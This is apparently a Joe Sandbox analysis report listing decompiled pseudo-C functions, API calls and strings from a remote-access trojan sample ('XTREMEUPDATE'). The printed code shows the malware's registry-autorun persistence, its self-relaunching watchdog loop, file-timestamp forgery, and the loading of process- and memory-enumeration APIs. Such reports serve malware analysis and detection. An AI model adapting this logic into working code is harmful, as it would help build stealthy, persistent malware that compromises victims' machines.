Function 00C83B9C, Relevance: 1.5, APIs: 1, Instructions: 12

C-Code - Quality: 100%

			E00C83B9C(WCHAR* __eax) {
				void* _t2;

				_t2 = CreateFileW(__eax, 0xc0000000, 0, 0, 3, 0x2000000, 0); // executed
				return _t2;
			}

0x00c83bb2
0x00c83bb8

APIs

CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02000000,00000000), ref: 00C83BB2

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C83690, Relevance: 1.5, APIs: 1, Instructions: 12

C-Code - Quality: 100%

			E00C83690(void* __eax, WCHAR* __edx) {
				signed int _t4;

				_t4 = SHDeleteKeyW(__eax, __edx); // executed
				return _t4 & 0xffffff00 | _t4 == 0x00000000;
			}

0x00c83698
0x00c836a4

APIs

SHDeleteKeyW.SHLWAPI(80000001,00000000), ref: 00C83698

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C81B50, Relevance: 1.5, APIs: 1, Instructions: 10

C-Code - Quality: 56%

			E00C81B50(signed int __eax) {
				signed int _t3;
				signed char _t14;
				void* _t16;
				void* _t20;

				_t3 = __eax;
				if(__eax == 0) {
					L11:
					return _t3;
				} else {
					_push(__eax);
					_push(0); // executed
					L00C81090(); // executed
					if(__eax == 0) {
						__eax = __eax & 0x0000007f;
						__edx =  *__esp;
						_t20 = _t16;
						_t14 = _t3 & 0x0000007f;
						if( *0xc8c004 != 0) {
							 *0xc8c004();
						}
						if(_t14 != 0) {
							if(_t14 <= 0x18) {
								_t2 = _t14 + 0xc8b050; // 0xc9c8cccb
								_t14 =  *_t2;
							}
						} else {
							_t14 =  *(E00C824B8() + 4);
						}
						return E00C81180(_t20);
					} else {
						goto L11;
					}
				}
			}

0x00c81b50
0x00c81b52
0x00c81b64
0x00c81b64
0x00c81b54
0x00c81b54
0x00c81b55
0x00c81b57
0x00c81b5e
0x00c811d8
0x00c811db
0x00c8118e
0x00c81192
0x00c8119c
0x00c811a2
0x00c811a2
0x00c811aa
0x00c811bc
0x00c811c2
0x00c811c2
0x00c811c2
0x00c811ac
0x00c811b1
0x00c811b1
0x00c811d5
0x00000000
0x00000000
0x00000000
0x00c81b5e

APIs

SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81B57

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C834AC, Relevance: 1.5, APIs: 1, Instructions: 10

C-Code - Quality: 100%

			E00C834AC(WCHAR* __eax) {
				signed char _t3;

				_t3 = GetFileAttributesW(__eax); // executed
				if(_t3 == 0xffffffff || (_t3 & 0x00000010) == 0) {
					return 0;
				} else {
					return 1;
				}
			}

0x00c834ad
0x00c834b5
0x00c834bd
0x00c834be
0x00c834c0
0x00c834c0

APIs

GetFileAttributesW.KERNEL32(00000000,00C834DA), ref: 00C834AD

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C833A8, Relevance: 1.3, APIs: 1, Instructions: 50

C-Code - Quality: 58%

			E00C833A8(void* __eax, void* __edx, void* __eflags) {
				void* _t3;
				void* _t8;
				void* _t17;
				void* _t23;
				void* _t34;
				void* _t35;
				intOrPtr* _t36;

				_t35 = __edx;
				_t23 = __eax;
				_t3 = E00C82E48(__eax);
				_t8 = VirtualAlloc(0, _t3 + _t3 + E00C82E48(_t35) + _t5, 0x1000, 4); // executed
				_t34 = _t8;
				E00C82E48(_t23);
				E00C82914(_t34, _t23);
				_push(E00C82E48(_t35) + _t14);
				_t17 = E00C82E48(_t23);
				_push(0);
				_push(_t17 + _t17);
				asm("cdq");
				asm("adc edx, [esp+0x4]");
				E00C82914(_t34 +  *_t36, _t35);
				return _t34;
			}

0x00c833ab
0x00c833ad
0x00c833b1
0x00c833d1
0x00c833d6
0x00c833da
0x00c833e7
0x00c833f5
0x00c833f8
0x00c83401
0x00c83402
0x00c83405
0x00c83409
0x00c83413
0x00c8341d

APIs

VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,?,?,00C89CE6,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C833D1

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Non-executed Functions

Function 00C88EF8, Relevance: 70.4, APIs: 23, Strings: 17, Instructions: 439
librarysleepfileCrypto

C-Code - Quality: 69%

			E00C88EF8(intOrPtr _a4) {
				void* _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t156;
				void* _t178;
				void* _t298;
				void* _t299;
				void* _t300;
				void* _t303;
				intOrPtr _t321;
				intOrPtr _t324;
				long _t349;
				intOrPtr _t351;

				LoadLibraryA("user32.dll");
				LoadLibraryA("advapi32.dll");
				LoadLibraryA("shell32.dll");
				LoadLibraryA("shlwapi.dll");
				LoadLibraryA("kernel32.dll");
				_v8 = 0;
				E00C8263C(0, 0, _a4 + 0x135e);
				_t298 = CreateFileW(_a4 + 0x181c, 0x80000000, 1, 0, 3, 0, 0);
				if(_t298 != 0xffffffff) {
					_v20 = GetFileSize(_t298, 0);
					_v16 = 0;
					_t349 = _v20;
					_v8 = VirtualAlloc(0, _t349, 0x1000, 4);
					SetFilePointer(_t298, 0, 0, 0);
					ReadFile(_t298, _v8, _t349,  &_v12, 0);
				}
				CloseHandle(_t298);
				_v12 = 0;
				Sleep(0x2710);
				_v24 = E00C833A8(_a4 + 0x181c, L" restart", _a4 + 0x181c);
				_v28 = E00C833A8(L"explorer.exe ", _a4 + 0x181c, _a4 + 0x181c);
				L3:
				while(1) {
					if( *((char*)(_a4 + 0x1258)) == 1) {
						if( *((char*)(_a4 + 0x12d8)) == 1) {
							E00C888D0(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 2, E00C82E48(_a4 + 0x181c) + _t287, 0, _a4 + 0x181c);
						}
						if( *((char*)(_a4 + 0x12d9)) == 1) {
							E00C888D0(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 2, E00C82E48(_a4 + 0x181c) + _t278, 0, _a4 + 0x181c);
						}
						if( *((char*)(_a4 + 0x12da)) == 1) {
							SHDeleteKeyW(0x80000001, _a4 + 0x1e3a);
							E00C888D0(0x80000002, _a4 + 0x1e3a, 2, E00C82E48(_v24) + _t269, 0, _v24);
						}
						if( *((char*)(_a4 + 0x12f2)) == 1) {
							if( *((char*)(_a4 + 0x12f3)) == 1) {
								E00C888D0(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 2, E00C82E48(_a4 + 0x181c) + _t250, 0, _a4 + 0x181c);
								E00C888D0(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 2, E00C82E48(_a4 + 0x181c) + _t259, 0, _a4 + 0x181c);
							}
							if( *((char*)(_a4 + 0x12f4)) == 1) {
								E00C888D0(0x80000001, L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", 2, E00C82E48(_a4 + 0x181c) + _t234, 0, _a4 + 0x181c);
								E00C888D0(0x80000002, L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", 2, E00C82E48(_a4 + 0x181c) + _t242, 0, _a4 + 0x181c);
							}
							if( *((char*)(_a4 + 0x12f5)) == 1) {
								E00C888D0(0x80000001, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", 2, E00C82E48(_v28) + _t220, 0, _v28);
								E00C888D0(0x80000002, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", 2, E00C82E48(_v28) + _t226, 0, _v28);
							}
							if( *((char*)(_a4 + 0x12f6)) == 1) {
								E00C888D0(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", 2, E00C82E48(_a4 + 0x181c) + _t204, 0, _a4 + 0x181c);
								E00C888D0(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", 2, E00C82E48(_a4 + 0x181c) + _t213, 0, _a4 + 0x181c);
							}
						}
					}
					if(E00C835B0(_a4 + 0x181c) != 0 || E00C834C4(_a4 + 0x1a26) == 0) {
						L30:
						_t299 = E00C8263C(0, 0, _a4 + 0x1310);
						if(GetLastError() == 0xb7) {
							CloseHandle(_t299);
						} else {
							CloseHandle(_t299);
							ShellExecuteW(0, L"open", _a4 + 0x181c, 0, 0, 0);
						}
						_t298 = E00C8263C(0, 0, _a4 + 0x1326);
						if(GetLastError() != 0xb7) {
							CloseHandle(_t298);
						} else {
							ExitProcess(0);
						}
						Sleep(0x1388);
						continue;
					} else {
						if(_v16 != 0) {
							if(__eflags <= 0) {
								L26:
								if( *((char*)(_a4 + 0x1235)) == 1) {
									SetFileAttributesW(_a4 + 0x1a26, 0x80);
									SetFileAttributesW(_a4 + 0x181c, 0x80);
									E00C81248();
									_push(0xc89399);
									_push( *[fs:eax]);
									 *[fs:eax] = _t351;
									_push(E00C812A4(0x1b) + 1);
									_push(E00C812A4(0xa) + 1);
									_push(E00C812A4(0xa) + 1);
									_push(E00C812A4(0xa) + 1);
									_push(E00C812A4(0xb) + 1);
									_t156 = E00C812A4(6);
									_pop(_t300);
									E00C83BC4(_a4 + 0x1a26, _t298, _t300, _t156 + 0x7d1);
									_pop(_t321);
									 *[fs:eax] = _t321;
									_push(_t350);
									_push(0xc89416);
									_push( *[fs:eax]);
									 *[fs:eax] = _t351;
									_push(E00C812A4(0x1b) + 1);
									_push(E00C812A4(0xa) + 1);
									_push(E00C812A4(0xa) + 1);
									_push(E00C812A4(0xa) + 1);
									_push(E00C812A4(0xb) + 1);
									_t178 = E00C812A4(6);
									_pop(_t303);
									E00C83BC4(_a4 + 0x181c, _t298, _t303, _t178 + 0x7d1);
									_pop(_t324);
									 *[fs:eax] = _t324;
									E00C83674(_a4 + 0x1a26);
									E00C83674(_a4 + 0x181c);
								}
								goto L30;
							}
							L25:
							E00C83218(_a4 + 0x181c, _v8, _v20, _v16);
							goto L26;
						}
						if(_v20 <= 0) {
							goto L26;
						}
						goto L25;
					}
				}
			}

0x00c88f06
0x00c88f10
0x00c88f1a
0x00c88f24
0x00c88f2e
0x00c88f35
0x00c88f45
0x00c88f67
0x00c88f6c
0x00c88f78
0x00c88f7b
0x00c88f85
0x00c88f90
0x00c88f9a
0x00c88fab
0x00c88fab
0x00c88fb1
0x00c88fb8
0x00c88fc0
0x00c88fd7
0x00c88fed
0x00000000
0x00c88ff0
0x00c88ffa
0x00c8900a
0x00c8903d
0x00c8903d
0x00c8904c
0x00c8907f
0x00c8907f
0x00c8908e
0x00c8909e
0x00c890ca
0x00c890ca
0x00c890d9
0x00c890e9
0x00c8911c
0x00c89152
0x00c89152
0x00c89161
0x00c89190
0x00c891c2
0x00c891c2
0x00c891d1
0x00c891f6
0x00c8921e
0x00c8921e
0x00c8922d
0x00c89260
0x00c89296
0x00c89296
0x00c8922d
0x00c890d9
0x00c892aa
0x00c8943a
0x00c8944c
0x00c89458
0x00c8947e
0x00c8945a
0x00c8945b
0x00c89476
0x00c89476
0x00c89495
0x00c894a1
0x00c894ad
0x00c894a3
0x00c894a5
0x00c894a5
0x00c894b7
0x00000000
0x00c892c5
0x00c892c9
0x00c892d3
0x00c892eb
0x00c892f5
0x00c89309
0x00c8931c
0x00c89321
0x00c89329
0x00c8932e
0x00c89331
0x00c8933f
0x00c8934b
0x00c89357
0x00c89363
0x00c8936f
0x00c89375
0x00c89389
0x00c8938a
0x00c89391
0x00c89394
0x00c893a5
0x00c893a6
0x00c893ab
0x00c893ae
0x00c893bc
0x00c893c8
0x00c893d4
0x00c893e0
0x00c893ec
0x00c893f2
0x00c89406
0x00c89407
0x00c8940e
0x00c89411
0x00c89428
0x00c89435
0x00c89435
0x00000000
0x00c892f5
0x00c892d5
0x00c892e6
0x00000000
0x00c892e6
0x00c892cf
0x00000000
0x00000000
0x00000000
0x00c892d1
0x00c892aa

APIs

LoadLibraryA.KERNEL32(user32.dll), ref: 00C88F06
LoadLibraryA.KERNEL32(advapi32.dll), ref: 00C88F10
LoadLibraryA.KERNEL32(shell32.dll), ref: 00C88F1A
LoadLibraryA.KERNEL32(shlwapi.dll), ref: 00C88F24
LoadLibraryA.KERNEL32(kernel32.dll), ref: 00C88F2E

Part of subcall function 00C8263C: CreateMutexW.KERNEL32(?,?,?,?,00C89C68,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C82652

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C88F62
GetFileSize.KERNEL32(00000000,00000000,?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,?,kernel32.dll,shlwapi.dll,shell32.dll,advapi32.dll), ref: 00C88F71
VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,00000000,00000000,?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,?), ref: 00C88F8B
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00001000,00000004,00000000,00000000,?,80000000,00000001,00000000,00000003,00000000), ref: 00C88F9A
ReadFile.KERNEL32(00000000,?,?,?,00000000), ref: 00C88FAB
CloseHandle.KERNEL32(00000000), ref: 00C88FB1
Sleep.KERNEL32(00002710,00000000,?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,?,kernel32.dll,shlwapi.dll,shell32.dll,advapi32.dll), ref: 00C88FC0

Part of subcall function 00C833A8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,?,?,00C89CE6,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C833D1

SHDeleteKeyW.SHLWAPI(80000001,?), ref: 00C8909E

Part of subcall function 00C888D0: RegCreateKeyW.ADVAPI32(80000001,SOFTWARE\FakeMessage,?), ref: 00C888E0
Part of subcall function 00C888D0: RegSetValueExW.ADVAPI32(?,FakeMessage,00000000,?,?,?,80000001,SOFTWARE\FakeMessage,?,00000000,?,FakeMessage,?,00C8992C,00000002,00000004), ref: 00C888F8
Part of subcall function 00C888D0: RegCloseKey.ADVAPI32(?,?,FakeMessage,00000000,?,?,?,80000001,SOFTWARE\FakeMessage,?,00000000,?,FakeMessage,?,00C8992C,00000002), ref: 00C88907

Part of subcall function 00C835B0: FindFirstFileW.KERNEL32(00000000), ref: 00C835B9
Part of subcall function 00C835B0: CloseHandle.KERNEL32(00000000), ref: 00C835CA

Part of subcall function 00C834C4: lstrlenW.KERNEL32(00000000), ref: 00C834EB
Part of subcall function 00C834C4: CreateDirectoryW.KERNEL32(?,00000000,00000000), ref: 00C83583

SetFileAttributesW.KERNEL32(?,00000080), ref: 00C89309
SetFileAttributesW.KERNEL32(?,00000080,?,00000080), ref: 00C8931C

Part of subcall function 00C81248: GetSystemTime.KERNEL32(?), ref: 00C81252

Part of subcall function 00C83BC4: SystemTimeToFileTime.KERNEL32(?,?,00000000,00C83C74,?,00000000), ref: 00C83C0F
Part of subcall function 00C83BC4: LocalFileTimeToFileTime.KERNEL32(?,?,?,?,00000000,00C83C74,?,00000000), ref: 00C83C20
Part of subcall function 00C83BC4: SetFileTime.KERNEL32(?,?,?,?,?,?,?,?,00000000,00C83C74,?,00000000), ref: 00C83C51

Part of subcall function 00C83674: GetFileAttributesW.KERNEL32(00000000,00000000,00C89E72,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C83678
Part of subcall function 00C83674: SetFileAttributesW.KERNEL32(00000000,00000000,00000000,00000000,00C89E72,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000), ref: 00C83688

Part of subcall function 00C83218: CreateFileW.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000), ref: 00C83233
Part of subcall function 00C83218: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00C8E07C,?,00000000,?,?,00C89E6B,0000181C,00000000,00000000,00000000,00000080,00000000), ref: 00C83252
Part of subcall function 00C83218: WriteFile.KERNEL32(00000000,00C80000,?,?,00000000), ref: 00C83263
Part of subcall function 00C83218: CloseHandle.KERNEL32(00000000), ref: 00C8326F

GetLastError.KERNEL32(00000000,00000000,?), ref: 00C8944E
CloseHandle.KERNEL32(00000000), ref: 00C8945B
ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00C89476
CloseHandle.KERNEL32(00000000), ref: 00C8947E
GetLastError.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?), ref: 00C89497
ExitProcess.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00C894A5
CloseHandle.KERNEL32(00000000), ref: 00C894AD
Sleep.KERNEL32(00001388,00000000,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00C894B7

Strings

advapi32.dll, xrefs: 00C88F0B
Software\Microsoft\Windows NT\CurrentVersion\Windows, xrefs: 00C89186, 00C891B8
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, xrefs: 00C891EC, 00C89214
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run, xrefs: 00C89256, 00C8928C
shell32.dll, xrefs: 00C88F15
explorer.exe , xrefs: 00C88FE3
kernel32.dll, xrefs: 00C88F29
StubPath, xrefs: 00C890B7
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00C89112, 00C89148
shlwapi.dll, xrefs: 00C88F1F
open, xrefs: 00C8946F
Load, xrefs: 00C89181, 00C891B3
Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 00C89033, 00C89075
user32.dll, xrefs: 00C88F01
Shell, xrefs: 00C891E7, 00C8920F
restart, xrefs: 00C88FC5
tBj, xrefs: 00C88F6C

Memory Dump Source

Source File: 00000003.00000002.14987723130.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000002.14987701888.00C80000.00000002.sdmp
Associated: 00000003.00000002.14987831627.00C8B000.00000004.sdmp
Associated: 00000003.00000002.14987969368.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c80000_server.jbxd

Yara matches

Function 00C87E20, Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99
library

C-Code - Quality: 100%

			E00C87E20() {

				if( *0xc8e034 == 0) {
					 *0xc8e034 = GetModuleHandleA("kernel32.dll");
					if( *0xc8e034 != 0) {
						 *0xc8e038 = GetProcAddress( *0xc8e034, "CreateToolhelp32Snapshot");
						 *0xc8e03c = GetProcAddress( *0xc8e034, "Heap32ListFirst");
						 *0xc8e040 = GetProcAddress( *0xc8e034, "Heap32ListNext");
						 *0xc8e044 = GetProcAddress( *0xc8e034, "Heap32First");
						 *0xc8e048 = GetProcAddress( *0xc8e034, "Heap32Next");
						 *0xc8e04c = GetProcAddress( *0xc8e034, "Toolhelp32ReadProcessMemory");
						 *0xc8e050 = GetProcAddress( *0xc8e034, "Process32First");
						 *0xc8e054 = GetProcAddress( *0xc8e034, "Process32Next");
						 *0xc8e058 = GetProcAddress( *0xc8e034, "Process32FirstW");
						 *0xc8e05c = GetProcAddress( *0xc8e034, "Process32NextW");
						 *0xc8e060 = GetProcAddress( *0xc8e034, "Thread32First");
						 *0xc8e064 = GetProcAddress( *0xc8e034, "Thread32Next");
						 *0xc8e068 = GetProcAddress( *0xc8e034, "Module32First");
						 *0xc8e06c = GetProcAddress( *0xc8e034, "Module32Next");
						 *0xc8e070 = GetProcAddress( *0xc8e034, "Module32FirstW");
						 *0xc8e074 = GetProcAddress( *0xc8e034, "Module32NextW");
					}
				}
				if( *0xc8e034 == 0 ||  *0xc8e038 == 0) {
					return 0;
				} else {
					return 1;
				}
			}

0x00c87e29
0x00c87e39
0x00c87e3e
0x00c87e51
0x00c87e63
0x00c87e75
0x00c87e87
0x00c87e99
0x00c87eab
0x00c87ebd
0x00c87ecf
0x00c87ee1
0x00c87ef3
0x00c87f05
0x00c87f17
0x00c87f29
0x00c87f3b
0x00c87f4d
0x00c87f5f
0x00c87f5f
0x00c87e3e
0x00c87f67
0x00c87f75
0x00c87f76
0x00c87f79
0x00c87f79

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000002,00C880A7,00000000,00000000,00C881FD,00000000,00C882B4,?,00000000,?), ref: 00C87E34
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00C880A7,00000000,00000000,00C881FD,00000000,00C882B4,?,00000000,?), ref: 00C87E4C
GetProcAddress.KERNEL32(00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00C880A7,00000000,00000000,00C881FD,00000000,00C882B4,?,00000000,?), ref: 00C87E5E
GetProcAddress.KERNEL32(00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00C880A7,00000000,00000000,00C881FD,00000000,00C882B4,?,00000000), ref: 00C87E70
GetProcAddress.KERNEL32(00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00C880A7,00000000,00000000,00C881FD,00000000,00C882B4), ref: 00C87E82
GetProcAddress.KERNEL32(00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00C880A7,00000000,00000000,00C881FD), ref: 00C87E94
GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00C880A7,00000000), ref: 00C87EA6
GetProcAddress.KERNEL32(00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002), ref: 00C87EB8
GetProcAddress.KERNEL32(00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot), ref: 00C87ECA
GetProcAddress.KERNEL32(00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst), ref: 00C87EDC
GetProcAddress.KERNEL32(00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext), ref: 00C87EEE
GetProcAddress.KERNEL32(00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First), ref: 00C87F00
GetProcAddress.KERNEL32(00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next), ref: 00C87F12
GetProcAddress.KERNEL32(00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory), ref: 00C87F24
GetProcAddress.KERNEL32(00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First), ref: 00C87F36
GetProcAddress.KERNEL32(00000000,Module32FirstW,00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next), ref: 00C87F48
GetProcAddress.KERNEL32(00000000,Module32NextW,00000000,Module32FirstW,00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW), ref: 00C87F5A

Strings

Process32Next, xrefs: 00C87EC2
Module32NextW, xrefs: 00C87F52
Process32FirstW, xrefs: 00C87ED4
Heap32ListNext, xrefs: 00C87E68
Process32First, xrefs: 00C87EB0
Toolhelp32ReadProcessMemory, xrefs: 00C87E9E
Module32FirstW, xrefs: 00C87F40
Thread32Next, xrefs: 00C87F0A
Module32Next, xrefs: 00C87F2E
Process32NextW, xrefs: 00C87EE6
kernel32.dll, xrefs: 00C87E2F
Thread32First, xrefs: 00C87EF8
Heap32Next, xrefs: 00C87E8C
CreateToolhelp32Snapshot, xrefs: 00C87E44
Heap32ListFirst, xrefs: 00C87E56
Module32First, xrefs: 00C87F1C
Heap32First, xrefs: 00C87E7A

Memory Dump Source

Source File: 00000003.00000002.14987723130.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000002.14987701888.00C80000.00000002.sdmp
Associated: 00000003.00000002.14987831627.00C8B000.00000004.sdmp
Associated: 00000003.00000002.14987969368.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c80000_server.jbxd

Yara matches

Function 00C8939E, Relevance: 31.9, APIs: 9, Strings: 9, Instructions: 356
sleepCrypto

C-Code - Quality: 58%

			E00C8939E() {
				void* _t121;
				void* _t143;
				void* _t257;
				void* _t258;
				void* _t259;
				void* _t262;
				intOrPtr _t278;
				intOrPtr _t281;
				void* _t305;
				intOrPtr _t306;

				E00C814F0();
				while(1) {
					_push(_t305);
					_push(0xc89416);
					_push( *[fs:eax]);
					 *[fs:eax] = _t306;
					_push(E00C812A4(0x1b) + 1);
					_push(E00C812A4(0xa) + 1);
					_push(E00C812A4(0xa) + 1);
					_push(E00C812A4(0xa) + 1);
					_push(E00C812A4(0xb) + 1);
					_t143 = E00C812A4(6);
					_pop(_t262);
					E00C83BC4( *((intOrPtr*)(_t305 + 8)) + 0x181c, _t257, _t262, _t143 + 0x7d1);
					_pop(_t281);
					 *[fs:eax] = _t281;
					E00C83674( *((intOrPtr*)(_t305 + 8)) + 0x1a26);
					E00C83674( *((intOrPtr*)(_t305 + 8)) + 0x181c);
					goto L28;
					do {
						do {
							L28:
							_t258 = E00C8263C(0, 0,  *((intOrPtr*)(_t305 + 8)) + 0x1310);
							if(GetLastError() == 0xb7) {
								CloseHandle(_t258);
							} else {
								CloseHandle(_t258);
								ShellExecuteW(0, L"open",  *((intOrPtr*)(_t305 + 8)) + 0x181c, 0, 0, 0);
							}
							_t257 = E00C8263C(0, 0,  *((intOrPtr*)(_t305 + 8)) + 0x1326);
							if(GetLastError() != 0xb7) {
								CloseHandle(_t257);
							} else {
								ExitProcess(0);
							}
							Sleep(0x1388);
							if( *((char*)( *((intOrPtr*)(_t305 + 8)) + 0x1258)) == 1) {
								if( *((char*)( *((intOrPtr*)(_t305 + 8)) + 0x12d8)) == 1) {
									E00C888D0(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 2, E00C82E48( *((intOrPtr*)(_t305 + 8)) + 0x181c) + _t252, 0,  *((intOrPtr*)(_t305 + 8)) + 0x181c);
								}
								if( *((char*)( *((intOrPtr*)(_t305 + 8)) + 0x12d9)) == 1) {
									E00C888D0(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 2, E00C82E48( *((intOrPtr*)(_t305 + 8)) + 0x181c) + _t243, 0,  *((intOrPtr*)(_t305 + 8)) + 0x181c);
								}
								if( *((char*)( *((intOrPtr*)(_t305 + 8)) + 0x12da)) == 1) {
									SHDeleteKeyW(0x80000001,  *((intOrPtr*)(_t305 + 8)) + 0x1e3a);
